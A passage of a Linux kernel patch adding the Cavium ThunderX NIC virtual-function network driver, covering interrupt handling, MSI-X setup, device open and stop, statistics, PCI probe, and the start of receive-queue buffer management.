interrupts */ + cq_head = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, + cq->cq_idx); + nicvf_clear_intr(nic, NICVF_INTR_CQ, cq->cq_idx); + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_HEAD, + cq->cq_idx, cq_head); + nicvf_enable_intr(nic, NICVF_INTR_CQ, cq->cq_idx); + } + return work_done; +} + +/* Qset error interrupt handler + * + * As of now only CQ errors are handled + */ +void nicvf_handle_qs_err(unsigned long data) +{ + struct nicvf *nic = (struct nicvf *)data; + struct queue_set *qs = nic->qs; + int qidx; + u64 status; + + netif_tx_disable(nic->netdev); + + /* Check if it is CQ err */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + status = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, + qidx); + if (!(status & CQ_ERR_MASK)) + continue; + /* Process already queued CQEs and reconfig CQ */ + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + nicvf_sq_disable(nic, qidx); + nicvf_cq_intr_handler(nic->netdev, qidx, NULL, 0); + nicvf_cmp_queue_config(nic, qs, qidx, true); + nicvf_sq_free_used_descs(nic->netdev, &qs->sq[qidx], qidx); + nicvf_sq_enable(nic, &qs->sq[qidx], qidx); + + nicvf_enable_intr(nic, NICVF_INTR_CQ, qidx); + } + + netif_tx_start_all_queues(nic->netdev); + /* Re-enable Qset error interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_QS_ERR, 0); +} + +static irqreturn_t nicvf_misc_intr_handler(int irq, void *nicvf_irq) +{ + struct nicvf *nic = (struct nicvf *)nicvf_irq; + u64 intr; + + intr = nicvf_reg_read(nic, NIC_VF_INT); + /* Check for spurious interrupt */ + if (!(intr & NICVF_INTR_MBOX_MASK)) + return IRQ_HANDLED; + + nicvf_handle_mbx_intr(nic); + + return IRQ_HANDLED; +} + +static irqreturn_t nicvf_intr_handler(int irq, void *nicvf_irq) +{ + u64 qidx, intr, clear_intr = 0; + u64 cq_intr, rbdr_intr, qs_err_intr; + struct nicvf *nic = (struct nicvf *)nicvf_irq; + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + + intr = nicvf_reg_read(nic, NIC_VF_INT); + if (netif_msg_intr(nic)) + 
netdev_info(nic->netdev, "%s: interrupt status 0x%llx\n", + nic->netdev->name, intr); + + qs_err_intr = intr & NICVF_INTR_QS_ERR_MASK; + if (qs_err_intr) { + /* Disable Qset err interrupt and schedule softirq */ + nicvf_disable_intr(nic, NICVF_INTR_QS_ERR, 0); + tasklet_hi_schedule(&nic->qs_err_task); + clear_intr |= qs_err_intr; + } + + /* Disable interrupts and start polling */ + cq_intr = (intr & NICVF_INTR_CQ_MASK) >> NICVF_INTR_CQ_SHIFT; + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + if (!(cq_intr & (1 << qidx))) + continue; + if (!nicvf_is_intr_enabled(nic, NICVF_INTR_CQ, qidx)) + continue; + + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + clear_intr |= ((1 << qidx) << NICVF_INTR_CQ_SHIFT); + + cq_poll = nic->napi[qidx]; + /* Schedule NAPI */ + if (cq_poll) + napi_schedule(&cq_poll->napi); + } + + /* Handle RBDR interrupts */ + rbdr_intr = (intr & NICVF_INTR_RBDR_MASK) >> NICVF_INTR_RBDR_SHIFT; + if (rbdr_intr) { + /* Disable RBDR interrupt and schedule softirq */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + if (!nicvf_is_intr_enabled(nic, NICVF_INTR_RBDR, qidx)) + continue; + nicvf_disable_intr(nic, NICVF_INTR_RBDR, qidx); + tasklet_hi_schedule(&nic->rbdr_task); + clear_intr |= ((1 << qidx) << NICVF_INTR_RBDR_SHIFT); + } + } + + /* Clear interrupts */ + nicvf_reg_write(nic, NIC_VF_INT, clear_intr); + return IRQ_HANDLED; +} + +static int nicvf_enable_msix(struct nicvf *nic) +{ + int ret, vec; + + nic->num_vec = NIC_VF_MSIX_VECTORS; + + for (vec = 0; vec < nic->num_vec; vec++) + nic->msix_entries[vec].entry = vec; + + ret = pci_enable_msix(nic->pdev, nic->msix_entries, nic->num_vec); + if (ret) { + netdev_err(nic->netdev, + "Req for #%d msix vectors failed\n", nic->num_vec); + return 0; + } + nic->msix_enabled = 1; + return 1; +} + +static void nicvf_disable_msix(struct nicvf *nic) +{ + if (nic->msix_enabled) { + pci_disable_msix(nic->pdev); + nic->msix_enabled = 0; + nic->num_vec = 0; + } +} + +static int nicvf_register_interrupts(struct nicvf *nic) +{ + int irq, free, ret = 0; + int vector; + + for_each_cq_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d CQ%d", + nic->vf_id, irq); + + for_each_sq_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d SQ%d", + nic->vf_id, irq - NICVF_INTR_ID_SQ); + + for_each_rbdr_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d RBDR%d", + nic->vf_id, irq - NICVF_INTR_ID_RBDR); + + /* Register all interrupts except mailbox */ + for (irq = 0; irq < NICVF_INTR_ID_SQ; irq++) { + vector = nic->msix_entries[irq].vector; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (ret) + break; + nic->irq_allocated[irq] = true; + } + + for (irq = NICVF_INTR_ID_SQ; irq < NICVF_INTR_ID_MISC; irq++) { + vector = nic->msix_entries[irq].vector; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (ret) + break; + nic->irq_allocated[irq] = true; + } + + sprintf(nic->irq_name[NICVF_INTR_ID_QS_ERR], + "NICVF%d Qset error", nic->vf_id); + if (!ret) { + vector = nic->msix_entries[NICVF_INTR_ID_QS_ERR].vector; + irq = NICVF_INTR_ID_QS_ERR; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (!ret) + nic->irq_allocated[irq] = true; + } + + if (ret) { + netdev_err(nic->netdev, "Request irq failed\n"); + for (free = 0; free < irq; free++) + free_irq(nic->msix_entries[free].vector, nic); + return ret; + } + + return 0; +} + +static void nicvf_unregister_interrupts(struct nicvf *nic) +{ + int irq; + + /* Free registered interrupts */ + for (irq = 0; irq < nic->num_vec; irq++) { + if 
(nic->irq_allocated[irq]) + free_irq(nic->msix_entries[irq].vector, nic); + nic->irq_allocated[irq] = false; + } + + /* Disable MSI-X */ + nicvf_disable_msix(nic); +} + +/* Initialize MSIX vectors and register MISC interrupt. + * Send READY message to PF to check if its alive + */ +static int nicvf_register_misc_interrupt(struct nicvf *nic) +{ + int ret = 0; + int irq = NICVF_INTR_ID_MISC; + + /* Return if mailbox interrupt is already registered */ + if (nic->msix_enabled) + return 0; + + /* Enable MSI-X */ + if (!nicvf_enable_msix(nic)) + return 1; + + sprintf(nic->irq_name[irq], "%s Mbox", "NICVF"); + /* Register Misc interrupt */ + ret = request_irq(nic->msix_entries[irq].vector, + nicvf_misc_intr_handler, 0, nic->irq_name[irq], nic); + + if (ret) + return ret; + nic->irq_allocated[irq] = true; + + /* Enable mailbox interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_MBOX, 0); + + /* Check if VF is able to communicate with PF */ + if (!nicvf_check_pf_ready(nic)) { + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + nicvf_unregister_interrupts(nic); + return 1; + } + + return 0; +} + +static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev) +{ + struct nicvf *nic = netdev_priv(netdev); + int qid = skb_get_queue_mapping(skb); + struct netdev_queue *txq = netdev_get_tx_queue(netdev, qid); + + /* Check for minimum packet length */ + if (skb->len <= ETH_HLEN) { + dev_kfree_skb(skb); + return NETDEV_TX_OK; + } + + if (!nicvf_sq_append_skb(nic, skb) && !netif_tx_queue_stopped(txq)) { + netif_tx_stop_queue(txq); + nic->drv_stats.tx_busy++; + if (netif_msg_tx_err(nic)) + netdev_warn(netdev, + "%s: Transmit ring full, stopping SQ%d\n", + netdev->name, qid); + + return NETDEV_TX_BUSY; + } + + return NETDEV_TX_OK; +} + +int nicvf_stop(struct net_device *netdev) +{ + int irq, qidx; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_SHUTDOWN; + nicvf_send_msg_to_pf(nic, &mbx); + + netif_carrier_off(netdev); + netif_tx_disable(netdev); + + /* Disable RBDR & QS error interrupts */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + nicvf_disable_intr(nic, NICVF_INTR_RBDR, qidx); + nicvf_clear_intr(nic, NICVF_INTR_RBDR, qidx); + } + nicvf_disable_intr(nic, NICVF_INTR_QS_ERR, 0); + nicvf_clear_intr(nic, NICVF_INTR_QS_ERR, 0); + + /* Wait for pending IRQ handlers to finish */ + for (irq = 0; irq < nic->num_vec; irq++) + synchronize_irq(nic->msix_entries[irq].vector); + + tasklet_kill(&nic->rbdr_task); + tasklet_kill(&nic->qs_err_task); + if (nic->rb_work_scheduled) + cancel_delayed_work_sync(&nic->rbdr_work); + + for (qidx = 0; qidx < nic->qs->cq_cnt; qidx++) { + cq_poll = nic->napi[qidx]; + if (!cq_poll) + continue; + nic->napi[qidx] = NULL; + napi_synchronize(&cq_poll->napi); + /* CQ intr is enabled while napi_complete, + * so disable it now + */ + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + nicvf_clear_intr(nic, NICVF_INTR_CQ, qidx); + napi_disable(&cq_poll->napi); + netif_napi_del(&cq_poll->napi); + kfree(cq_poll); + } + + /* Free resources */ + nicvf_config_data_transfer(nic, false); + + /* Disable HW Qset */ + nicvf_qset_config(nic, false); + + /* disable mailbox interrupt */ + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + + nicvf_unregister_interrupts(nic); + + return 0; +} + +int nicvf_open(struct net_device *netdev) +{ + int err, qidx; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + + 
nic->mtu = netdev->mtu; + + netif_carrier_off(netdev); + + err = nicvf_register_misc_interrupt(nic); + if (err) + return err; + + /* Register NAPI handler for processing CQEs */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + cq_poll = kzalloc(sizeof(*cq_poll), GFP_KERNEL); + if (!cq_poll) { + err = -ENOMEM; + goto napi_del; + } + cq_poll->cq_idx = qidx; + netif_napi_add(netdev, &cq_poll->napi, nicvf_poll, + NAPI_POLL_WEIGHT); + napi_enable(&cq_poll->napi); + nic->napi[qidx] = cq_poll; + } + + /* Check if we got MAC address from PF or else generate a radom MAC */ + if (is_zero_ether_addr(netdev->dev_addr)) { + eth_hw_addr_random(netdev); + nicvf_hw_set_mac_addr(nic, netdev); + } + + /* Init tasklet for handling Qset err interrupt */ + tasklet_init(&nic->qs_err_task, nicvf_handle_qs_err, + (unsigned long)nic); + + /* Init RBDR tasklet which will refill RBDR */ + tasklet_init(&nic->rbdr_task, nicvf_rbdr_task, + (unsigned long)nic); + INIT_DELAYED_WORK(&nic->rbdr_work, nicvf_rbdr_work); + + /* Configure CPI alorithm */ + nic->cpi_alg = cpi_alg; + nicvf_config_cpi(nic); + + /* Configure receive side scaling */ + nicvf_rss_init(nic); + + err = nicvf_register_interrupts(nic); + if (err) + goto cleanup; + + /* Initialize the queues */ + err = nicvf_init_resources(nic); + if (err) + goto cleanup; + + /* Make sure queue initialization is written */ + wmb(); + + nicvf_reg_write(nic, NIC_VF_INT, -1); + /* Enable Qset err interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_QS_ERR, 0); + + /* Enable completion queue interrupt */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_enable_intr(nic, NICVF_INTR_CQ, qidx); + + /* Enable RBDR threshold interrupt */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_enable_intr(nic, NICVF_INTR_RBDR, qidx); + + netif_carrier_on(netdev); + netif_tx_start_all_queues(netdev); + + return 0; +cleanup: + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + nicvf_unregister_interrupts(nic); +napi_del: + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + cq_poll = nic->napi[qidx]; + if (!cq_poll) + continue; + napi_disable(&cq_poll->napi); + netif_napi_del(&cq_poll->napi); + kfree(cq_poll); + nic->napi[qidx] = NULL; + } + return err; +} + +static int nicvf_update_hw_max_frs(struct nicvf *nic, int mtu) +{ + union nic_mbx mbx = {}; + + mbx.frs.msg = NIC_MBOX_MSG_SET_MAX_FRS; + mbx.frs.max_frs = mtu; + mbx.frs.vf_id = nic->vf_id; + + return nicvf_send_msg_to_pf(nic, &mbx); +} + +static int nicvf_change_mtu(struct net_device *netdev, int new_mtu) +{ + struct nicvf *nic = netdev_priv(netdev); + + if (new_mtu > NIC_HW_MAX_FRS) + return -EINVAL; + + if (new_mtu < NIC_HW_MIN_FRS) + return -EINVAL; + + if (nicvf_update_hw_max_frs(nic, new_mtu)) + return -EINVAL; + netdev->mtu = new_mtu; + nic->mtu = new_mtu; + + return 0; +} + +static int nicvf_set_mac_address(struct net_device *netdev, void *p) +{ + struct sockaddr *addr = p; + struct nicvf *nic = netdev_priv(netdev); + + if (!is_valid_ether_addr(addr->sa_data)) + return -EADDRNOTAVAIL; + + memcpy(netdev->dev_addr, addr->sa_data, netdev->addr_len); + + if (nic->msix_enabled) + if (nicvf_hw_set_mac_addr(nic, netdev)) + return -EBUSY; + + return 0; +} + +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) +{ + if (bgx->rx) + nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; + else + nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; +} + +void nicvf_update_lmac_stats(struct nicvf *nic) +{ + int stat = 0; + union nic_mbx mbx = {}; + int timeout; + + if (!netif_running(nic->netdev)) + return; + + mbx.bgx_stats.msg = 
NIC_MBOX_MSG_BGX_STATS; + mbx.bgx_stats.vf_id = nic->vf_id; + /* Rx stats */ + mbx.bgx_stats.rx = 1; + while (stat < BGX_RX_STATS_COUNT) { + nic->bgx_stats_acked = 0; + mbx.bgx_stats.idx = stat; + nicvf_send_msg_to_pf(nic, &mbx); + timeout = 0; + while ((!nic->bgx_stats_acked) && (timeout < 10)) { + msleep(2); + timeout++; + } + stat++; + } + + stat = 0; + + /* Tx stats */ + mbx.bgx_stats.rx = 0; + while (stat < BGX_TX_STATS_COUNT) { + nic->bgx_stats_acked = 0; + mbx.bgx_stats.idx = stat; + nicvf_send_msg_to_pf(nic, &mbx); + timeout = 0; + while ((!nic->bgx_stats_acked) && (timeout < 10)) { + msleep(2); + timeout++; + } + stat++; + } +} + +void nicvf_update_stats(struct nicvf *nic) +{ + int qidx; + struct nicvf_hw_stats *stats = &nic->stats; + struct nicvf_drv_stats *drv_stats = &nic->drv_stats; + struct queue_set *qs = nic->qs; + +#define GET_RX_STATS(reg) \ + nicvf_reg_read(nic, NIC_VNIC_RX_STAT_0_13 | (reg << 3)) +#define GET_TX_STATS(reg) \ + nicvf_reg_read(nic, NIC_VNIC_TX_STAT_0_4 | (reg << 3)) + + stats->rx_bytes_ok = GET_RX_STATS(RX_OCTS); + stats->rx_ucast_frames_ok = GET_RX_STATS(RX_UCAST); + stats->rx_bcast_frames_ok = GET_RX_STATS(RX_BCAST); + stats->rx_mcast_frames_ok = GET_RX_STATS(RX_MCAST); + stats->rx_fcs_errors = GET_RX_STATS(RX_FCS); + stats->rx_l2_errors = GET_RX_STATS(RX_L2ERR); + stats->rx_drop_red = GET_RX_STATS(RX_RED); + stats->rx_drop_overrun = GET_RX_STATS(RX_ORUN); + stats->rx_drop_bcast = GET_RX_STATS(RX_DRP_BCAST); + stats->rx_drop_mcast = GET_RX_STATS(RX_DRP_MCAST); + stats->rx_drop_l3_bcast = GET_RX_STATS(RX_DRP_L3BCAST); + stats->rx_drop_l3_mcast = GET_RX_STATS(RX_DRP_L3MCAST); + + stats->tx_bytes_ok = GET_TX_STATS(TX_OCTS); + stats->tx_ucast_frames_ok = GET_TX_STATS(TX_UCAST); + stats->tx_bcast_frames_ok = GET_TX_STATS(TX_BCAST); + stats->tx_mcast_frames_ok = GET_TX_STATS(TX_MCAST); + stats->tx_drops = GET_TX_STATS(TX_DROP); + + drv_stats->rx_frames_ok = stats->rx_ucast_frames_ok + + stats->rx_bcast_frames_ok + + stats->rx_mcast_frames_ok; + drv_stats->tx_frames_ok = stats->tx_ucast_frames_ok + + stats->tx_bcast_frames_ok + + stats->tx_mcast_frames_ok; + drv_stats->rx_drops = stats->rx_drop_red + + stats->rx_drop_overrun; + drv_stats->tx_drops = stats->tx_drops; + + /* Update RQ and SQ stats */ + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_update_rq_stats(nic, qidx); + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_update_sq_stats(nic, qidx); +} + +struct rtnl_link_stats64 *nicvf_get_stats64(struct net_device *netdev, + struct rtnl_link_stats64 *stats) +{ + struct nicvf *nic = netdev_priv(netdev); + struct nicvf_hw_stats *hw_stats = &nic->stats; + struct nicvf_drv_stats *drv_stats = &nic->drv_stats; + + nicvf_update_stats(nic); + + stats->rx_bytes = hw_stats->rx_bytes_ok; + stats->rx_packets = drv_stats->rx_frames_ok; + stats->rx_dropped = drv_stats->rx_drops; + + stats->tx_bytes = hw_stats->tx_bytes_ok; + stats->tx_packets = drv_stats->tx_frames_ok; + stats->tx_dropped = drv_stats->tx_drops; + + return stats; +} + +static void nicvf_tx_timeout(struct net_device *dev) +{ + struct nicvf *nic = netdev_priv(dev); + + if (netif_msg_tx_err(nic)) + netdev_warn(dev, "%s: Transmit timed out, resetting\n", + dev->name); + + schedule_work(&nic->reset_task); +} + +static void nicvf_reset_task(struct work_struct *work) +{ + struct nicvf *nic; + + nic = container_of(work, struct nicvf, reset_task); + + if (!netif_running(nic->netdev)) + return; + + nicvf_stop(nic->netdev); + nicvf_open(nic->netdev); + nic->netdev->trans_start = jiffies; +} + +static const 
struct net_device_ops nicvf_netdev_ops = { + .ndo_open = nicvf_open, + .ndo_stop = nicvf_stop, + .ndo_start_xmit = nicvf_xmit, + .ndo_change_mtu = nicvf_change_mtu, + .ndo_set_mac_address = nicvf_set_mac_address, + .ndo_get_stats64 = nicvf_get_stats64, + .ndo_tx_timeout = nicvf_tx_timeout, +}; + +static int nicvf_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + struct device *dev = &pdev->dev; + struct net_device *netdev; + struct nicvf *nic; + struct queue_set *qs; + int err; + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + err = pci_set_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get usable DMA configuration\n"); + goto err_release_regions; + } + + err = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "unable to get 48-bit DMA for consistent allocations\n"); + goto err_release_regions; + } + + netdev = alloc_etherdev_mqs(sizeof(struct nicvf), + MAX_RCV_QUEUES_PER_QS, + MAX_SND_QUEUES_PER_QS); + if (!netdev) { + err = -ENOMEM; + goto err_release_regions; + } + + pci_set_drvdata(pdev, netdev); + + SET_NETDEV_DEV(netdev, &pdev->dev); + + nic = netdev_priv(netdev); + nic->netdev = netdev; + nic->pdev = pdev; + + /* MAP VF's configuration registers */ + nic->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!nic->reg_base) { + dev_err(dev, "Cannot map config register space, aborting\n"); + err = -ENOMEM; + goto err_free_netdev; + } + + err = nicvf_set_qset_resources(nic); + if (err) + goto err_free_netdev; + + qs = nic->qs; + + err = nicvf_set_real_num_queues(netdev, qs->sq_cnt, qs->rq_cnt); + if (err) + goto err_free_netdev; + + /* Check if PF is alive and get MAC address for this VF */ + err = nicvf_register_misc_interrupt(nic); + if (err) + goto err_free_netdev; + + netdev->features |= (NETIF_F_RXCSUM | NETIF_F_IP_CSUM | NETIF_F_SG | + NETIF_F_TSO | NETIF_F_GRO); + netdev->hw_features = netdev->features; + + netdev->netdev_ops = &nicvf_netdev_ops; + + INIT_WORK(&nic->reset_task, nicvf_reset_task); + + err = register_netdev(netdev); + if (err) { + dev_err(dev, "Failed to register netdevice\n"); + goto err_unregister_interrupts; + } + + nic->msg_enable = debug; + + nicvf_set_ethtool_ops(netdev); + + return 0; + +err_unregister_interrupts: + nicvf_unregister_interrupts(nic); +err_free_netdev: + pci_set_drvdata(pdev, NULL); + free_netdev(netdev); +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + return err; +} + +static void nicvf_remove(struct pci_dev *pdev) +{ + struct net_device *netdev = pci_get_drvdata(pdev); + struct nicvf *nic = netdev_priv(netdev); + + unregister_netdev(netdev); + nicvf_unregister_interrupts(nic); + pci_set_drvdata(pdev, NULL); + free_netdev(netdev); + pci_release_regions(pdev); + pci_disable_device(pdev); +} + +static struct pci_driver nicvf_driver = { + .name = DRV_NAME, + .id_table = nicvf_id_table, + .probe = nicvf_probe, + .remove = nicvf_remove, +}; + +static int __init nicvf_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&nicvf_driver); +} + +static void __exit nicvf_cleanup_module(void) +{ + pci_unregister_driver(&nicvf_driver); +} + +module_init(nicvf_init_module); +module_exit(nicvf_cleanup_module); diff --git 
a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c new file mode 100644 index 000000000000..196246665444 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -0,0 +1,1544 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "q_struct.h" +#include "nicvf_queues.h" + +struct rbuf_info { + struct page *page; + void *data; + u64 offset; +}; + +#define GET_RBUF_INFO(x) ((struct rbuf_info *)(x - NICVF_RCV_BUF_ALIGN_BYTES)) + +/* Poll a register for a specific value */ +static int nicvf_poll_reg(struct nicvf *nic, int qidx, + u64 reg, int bit_pos, int bits, int val) +{ + u64 bit_mask; + u64 reg_val; + int timeout = 10; + + bit_mask = (1ULL << bits) - 1; + bit_mask = (bit_mask << bit_pos); + + while (timeout) { + reg_val = nicvf_queue_reg_read(nic, reg, qidx); + if (((reg_val & bit_mask) >> bit_pos) == val) + return 0; + usleep_range(1000, 2000); + timeout--; + } + netdev_err(nic->netdev, "Poll on reg 0x%llx failed\n", reg); + return 1; +} + +/* Allocate memory for a queue's descriptors */ +static int nicvf_alloc_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem, + int q_len, int desc_size, int align_bytes) +{ + dmem->q_len = q_len; + dmem->size = (desc_size * q_len) + align_bytes; + /* Save address, need it while freeing */ + dmem->unalign_base = dma_zalloc_coherent(&nic->pdev->dev, dmem->size, + &dmem->dma, GFP_KERNEL); + if (!dmem->unalign_base) + return -ENOMEM; + + /* Align memory address for 'align_bytes' */ + dmem->phys_base = NICVF_ALIGNED_ADDR((u64)dmem->dma, align_bytes); + dmem->base = (void *)((u8 *)dmem->unalign_base + + (dmem->phys_base - dmem->dma)); + return 0; +} + +/* Free queue's descriptor memory */ +static void nicvf_free_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem) +{ + if (!dmem) + return; + + dma_free_coherent(&nic->pdev->dev, dmem->size, + dmem->unalign_base, dmem->dma); + dmem->unalign_base = NULL; + dmem->base = NULL; +} + +/* Allocate buffer for packet reception + * HW returns memory address where packet is DMA'ed but not a pointer + * into RBDR ring, so save buffer address at the start of fragment and + * align the start address to a cache aligned address + */ +static inline int nicvf_alloc_rcv_buffer(struct nicvf *nic, gfp_t gfp, + u32 buf_len, u64 **rbuf) +{ + u64 data; + struct rbuf_info *rinfo; + int order = get_order(buf_len); + + /* Check if request can be accomodated in previous allocated page */ + if (nic->rb_page) { + if ((nic->rb_page_offset + buf_len + buf_len) > + (PAGE_SIZE << order)) { + nic->rb_page = NULL; + } else { + nic->rb_page_offset += buf_len; + get_page(nic->rb_page); + } + } + + /* Allocate a new page */ + if (!nic->rb_page) { + nic->rb_page = alloc_pages(gfp | __GFP_COMP, order); + if (!nic->rb_page) { + netdev_err(nic->netdev, "Failed to allocate new rcv buffer\n"); + return -ENOMEM; + } + nic->rb_page_offset = 0; + } + + data = (u64)page_address(nic->rb_page) + nic->rb_page_offset; + + /* Align buffer addr to cache line i.e 128 bytes */ + rinfo = (struct rbuf_info *)(data + NICVF_RCV_BUF_ALIGN_LEN(data)); + /* Save page address for reference updation */ + rinfo->page = nic->rb_page; + /* Store start address for later retrieval */ + rinfo->data = (void 
*)data; + /* Store alignment offset */ + rinfo->offset = NICVF_RCV_BUF_ALIGN_LEN(data); + + data += rinfo->offset; + + /* Give next aligned address to hw for DMA */ + *rbuf = (u64 *)(data + NICVF_RCV_BUF_ALIGN_BYTES); + return 0; +} + +/* Retrieve actual buffer start address and build skb for received packet */ +static struct sk_buff *nicvf_rb_ptr_to_skb(struct nicvf *nic, + u64 rb_ptr, int len) +{ + struct sk_buff *skb; + struct rbuf_info *rinfo; + + rb_ptr = (u64)phys_to_virt(rb_ptr); + /* Get buffer start address and alignment offset */ + rinfo = GET_RBUF_INFO(rb_ptr); + + /* Now build an skb to give to stack */ + skb = build_skb(rinfo->data, RCV_FRAG_LEN); + if (!skb) { + put_page(rinfo->page); + return NULL; + } + + /* Set correct skb->data */ + skb_reserve(skb, rinfo->offset + NICVF_RCV_BUF_ALIGN_BYTES); + + prefetch((void *)rb_ptr); + return skb; +} + +/* Allocate RBDR ring and populate receive buffers */ +static int nicvf_init_rbdr(struct nicvf *nic, struct rbdr *rbdr, + int ring_len, int buf_size) +{ + int idx; + u64 *rbuf; + struct rbdr_entry_t *desc; + int err; + + err = nicvf_alloc_q_desc_mem(nic, &rbdr->dmem, ring_len, + sizeof(struct rbdr_entry_t), + NICVF_RCV_BUF_ALIGN_BYTES); + if (err) + return err; + + rbdr->desc = rbdr->dmem.base; + /* Buffer size has to be in multiples of 128 bytes */ + rbdr->dma_size = buf_size; + rbdr->enable = true; + rbdr->thresh = RBDR_THRESH; + + nic->rb_page = NULL; + for (idx = 0; idx < ring_len; idx++) { + err = nicvf_alloc_rcv_buffer(nic, GFP_KERNEL, RCV_FRAG_LEN, + &rbuf); + if (err) + return err; + + desc = GET_RBDR_DESC(rbdr, idx); + desc->buf_addr = virt_to_phys(rbuf) >> NICVF_RCV_BUF_ALIGN; + } + return 0; +} + +/* Free RBDR ring and its receive buffers */ +static void nicvf_free_rbdr(struct nicvf *nic, struct rbdr *rbdr) +{ + int head, tail; + u64 buf_addr; + struct rbdr_entry_t *desc; + struct rbuf_info *rinfo; + + if (!rbdr) + return; + + rbdr->enable = false; + if (!rbdr->dmem.base) + return; + + head = rbdr->head; + tail = rbdr->tail; + + /* Free SKBs */ + while (head != tail) { + desc = GET_RBDR_DESC(rbdr, head); + buf_addr = desc->buf_addr << NICVF_RCV_BUF_ALIGN; + rinfo = GET_RBUF_INFO((u64)phys_to_virt(buf_addr)); + put_page(rinfo->page); + head++; + head &= (rbdr->dmem.q_len - 1); + } + /* Free SKB of tail desc */ + desc = GET_RBDR_DESC(rbdr, tail); + buf_addr = desc->buf_addr << NICVF_RCV_BUF_ALIGN; + rinfo = GET_RBUF_INFO((u64)phys_to_virt(buf_addr)); + put_page(rinfo->page); + + /* Free RBDR ring */ + nicvf_free_q_desc_mem(nic, &rbdr->dmem); +} + +/* Refill receive buffer descriptors with new buffers. 
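+ * Called from the RBDR tasklet (atomic context) and from the delayed
+ * workqueue handler (process context); the gfp argument selects GFP_ATOMIC
+ * or GFP_KERNEL accordingly.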
+ */ +void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) +{ + struct queue_set *qs = nic->qs; + int rbdr_idx = qs->rbdr_cnt; + int tail, qcount; + int refill_rb_cnt; + struct rbdr *rbdr; + struct rbdr_entry_t *desc; + u64 *rbuf; + int new_rb = 0; + +refill: + if (!rbdr_idx) + return; + rbdr_idx--; + rbdr = &qs->rbdr[rbdr_idx]; + /* Check if it's enabled */ + if (!rbdr->enable) + goto next_rbdr; + + /* Get no of desc's to be refilled */ + qcount = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_STATUS0, rbdr_idx); + qcount &= 0x7FFFF; + /* Doorbell can be ringed with a max of ring size minus 1 */ + if (qcount >= (qs->rbdr_len - 1)) + goto next_rbdr; + else + refill_rb_cnt = qs->rbdr_len - qcount - 1; + + /* Start filling descs from tail */ + tail = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_TAIL, rbdr_idx) >> 3; + while (refill_rb_cnt) { + tail++; + tail &= (rbdr->dmem.q_len - 1); + + if (nicvf_alloc_rcv_buffer(nic, gfp, RCV_FRAG_LEN, &rbuf)) + break; + + desc = GET_RBDR_DESC(rbdr, tail); + desc->buf_addr = virt_to_phys(rbuf) >> NICVF_RCV_BUF_ALIGN; + refill_rb_cnt--; + new_rb++; + } + + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Check if buffer allocation failed */ + if (refill_rb_cnt) + nic->rb_alloc_fail = true; + else + nic->rb_alloc_fail = false; + + /* Notify HW */ + 